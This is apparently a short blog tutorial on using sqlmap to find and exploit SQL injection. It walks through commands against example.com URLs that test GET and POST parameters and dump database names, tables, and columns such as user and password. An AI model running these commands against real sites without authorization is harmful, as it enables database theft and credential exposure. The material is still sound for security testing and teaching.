Sqlmap automate SQL injection within web applications.

Sqlmap is an open source software used to automate SQL injection search within web applications. With Sqlmap it is possible to find the vulnerability, exploit it and connect to the database to view, modify or delete the tables.

SQL injection is a hacking technique that aims to inject code by exploiting vulnerabilities in a web application that uses SQL-type databases. The vulnerability is due to the lack of controls on the input data received. SQL commands are then injected through queries into the database of a web application in order to authenticate with maximum privileges in protected areas of the site even without having access credentials and to view and alter sensitive data.

Among the types of sql injection techniques supported by sqlmap we find:

boolean-based blind;
time-based blind;
error-based;
union query-based;
stacked queries;
out-of-band.

The tests it can perform can take advantage of the GET, POST, HTTP values Cookie, User-Agent and HTTP Referer parameters.

GET requests

An example of sqlmap command using a GET request is the following:

sqlmap -u "http://example.com/?id=1" -p id

Where “id” is the parameter to be tested.

-u: URL to scan.

POST requests

A POST request may be the following:

sqlmap -u "http://example.com/login.php" --data "user=admin&pass=pass" --method POST

Where the parameters to be tested are “user” and “pass”.

dump option

dump option is useful for dump database data such as database name, tables names and columns data:

sqlmap -u "http://example.com/?id=1" -p id --dump -T users

to dump “users” table (-T option).

-D stands for Database name;

-T stands for Table;

-C stands for Column.

sqlmap -u "http://example.com/?id=1" -p id --dump

to dump all possible.

When we get database name we can run sqlmap to let show us the Tables contained in database:

sqlmap -u "http://example.com/?id=1" -p id -D example_database_name --dump

The result should show us the Tables names, then we can gain the columns names within one of the Table found:

sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name --dump

Finally, to see the contents of a column within a table:

sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C example_column_name --dump

If we want to see the content of two or more Columns we can run the following:

sqlmap -u "http://example.com/?id=1" -p id -D example_database_name -T example_table_name -C column1,column2,user,password --dump

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.